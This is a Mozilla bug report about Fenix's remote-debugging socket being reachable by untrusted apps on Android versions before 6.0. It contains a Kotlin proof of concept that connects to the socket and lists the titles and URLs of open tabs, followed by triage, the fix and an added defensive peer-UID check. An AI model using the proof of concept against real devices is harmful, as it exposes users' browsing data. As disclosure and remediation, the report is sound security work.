Untrusted apps can connect Fenix's remote debugging socket on older Android devices
Categories: Fenix :: General, task
Tracking: firefox82 wontfix, firefox83 fixed, firefox84 fixed
People: Reporter: sdna.muneaki.nishimura, Assigned: mcarare
Details: Keywords: reporter-external, sec-low; Whiteboard: [reporter-external] [client-bounty-form] [verif?][adv-main83+]
Attachments: 2 files, 1 obsolete file
I'm not sure whether this is a security bug or by design (i.e., an already considered and accepted risk), but Fenix's remote debugging socket can be connected to from untrusted apps if the Android OS version is older than 6.
When the user enables "Remote debugging via USB", Fenix creates a Unix domain socket whose name is firefox-debugger-socket. That socket is not explicitly protected by Fenix itself, but it's not connectable from untrusted apps because Unix sockets are banned by Android's SELinux policy (below).
https://android.googlesource.com/platform/external/sepolicy/+/57531cacb40682be4b1189c721fd1e7f25bf3786/untrusted_app.te#137
But the SELinux policy was enforced from Android version 6.0 (Marshmallow).
Android versions older than 6.0 (such as 5.1 Lollipop) allow using them without any permissions.
As you know, Android 5.1 is very old, but it still has about 8% share. Also, the Mozilla website clearly mentions that Firefox is compatible with devices running Android 4.1 or above (below).
https://support.mozilla.org/en-US/kb/will-firefox-work-my-mobile-device#mobile::m79
If so, in order to protect the debugger socket, there should be some protections in Fenix itself, for example, hiding the "Remote debugging via USB" button on old devices.
The following Kotlin code can reproduce this issue on a Nexus 6 emulator with the Android 5.1 stock image. See also the attached animated GIF for the demo.
var socket = LocalSocket()
var addr = LocalSocketAddress("org.mozilla.fenix/firefox-debugger-socket")
socket.connect(addr)
Toast.makeText(applicationContext, "Connected", Toast.LENGTH_SHORT).show()
var reader: Scanner = Scanner(socket.getInputStream())
var writer: OutputStream = socket.getOutputStream()
reader.nextLine()
// List tab request
var req = "48:{\"type\":\"listTabs\",\"favicons\":false,\"to\":\"root\"}"
writer.write((req + '\n').toByteArray(Charset.defaultCharset()))
// Parse response
var resp = reader.nextLine().toString()
var index = resp.indexOf("{", 0)
var tabs = JSONObject(resp.substring(index)).getJSONArray("tabs")
// Show tab info
for(i in 0 until tabs.length()) {
    var tab = tabs.getJSONObject(i)
    var outerWindowID = tab.getInt("outerWindowID")
    var title = tab.getString("title")
    var url = tab.getString("url")
    var output = "#${i+1} Window ID: ${outerWindowID}\nTitle: ${title}\n URL: ${url}"
    Toast.makeText(applicationContext, output, Toast.LENGTH_LONG).show()
}
socket.close()
Comment 1•5 years ago
Thank you for providing a demo!
I think this is sec-low. I could be convinced that this is sec-moderate if the affected Android versions weren't so old. It still requires the user to run a bad app.
Comment 2•4 years ago
Stefan, what's our support for Android 5.1? Is this here a WONTFIX?
Comment 3•4 years ago
We still support Android 5.0 and 5.1. It is not 8% of users; it is under 4%. We should disable this for Android 5.0 and 5.1. Should be able to stop this by disabling the USB debugging option in the affected Android versions. We should document it at https://developer.mozilla.org/en-US/docs/Tools/about:debugging#Connecting_to_a_remote_device that Android 5.0 and 5.1 do not have this feature.
Comment 4•4 years ago
Filed https://github.com/mozilla-mobile/fenix/issues/16250 for fixing this on Fenix.
Comment 5•4 years ago
A patch landed on master in the Fenix repo that will disable USB debugging for Android < 6.0 devices:
https://github.com/mozilla-mobile/fenix/commit/3cb2c83980a3fd799ddeef2d3f0745a17f73bef4
Comment 6•4 years ago
Seems like this would be safe to uplift to 83?
Comment 7•4 years ago
Yeah, let's uplift.
Comment 9•4 years ago
Patch landed on the 83 release branch and should get out with 83 Beta 3 later this week.
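Added example (not Fenix code and not part of the patch in this bug): the landed fix disables the option on Android < 6.0, while the report notes the socket is "not explicitly protected by Fenix itself". A version-independent safeguard for an abstract Unix domain socket is to check each peer's UID before exchanging any protocol bytes. The function names, the socket name parameter and the allowed-UID list are assumptions made for this sketch.

```kotlin
import android.net.LocalServerSocket
import android.net.LocalSocket
import android.os.Process
import java.io.IOException

// Assumption: adbd on production builds runs as the "shell" user (UID 2000),
// so connections arriving through `adb forward` carry that UID.
private const val SHELL_UID = 2000
private const val ROOT_UID = 0

/** Pure decision function: which peer UIDs may talk to the debugger socket. */
fun isPeerAllowed(peerUid: Int, ownUid: Int): Boolean =
    peerUid == ownUid || peerUid == SHELL_UID || peerUid == ROOT_UID

/**
 * Accept loop for a hypothetical debug socket. Every connection is checked
 * with the kernel-reported peer credentials (SO_PEERCRED, exposed as
 * LocalSocket.getPeerCredentials) before the handler sees it. Other apps
 * have their own UID, so they are closed without a greeting or any data.
 */
fun serveDebugSocket(name: String, handle: (LocalSocket) -> Unit) {
    // LocalServerSocket(String) listens in the Linux abstract namespace,
    // where no file permissions protect the socket.
    val server = LocalServerSocket(name)
    try {
        while (true) {
            val client = server.accept()
            try {
                val peerUid = client.peerCredentials.uid
                if (isPeerAllowed(peerUid, Process.myUid())) {
                    handle(client)
                }
            } catch (e: IOException) {
                // Credentials unavailable or I/O failure: fail closed.
            } finally {
                client.close()
            }
        }
    } finally {
        server.close()
    }
}
```

Because the peer UID comes from the kernel rather than from the client, this check does not depend on the SELinux policy of the Android version in use.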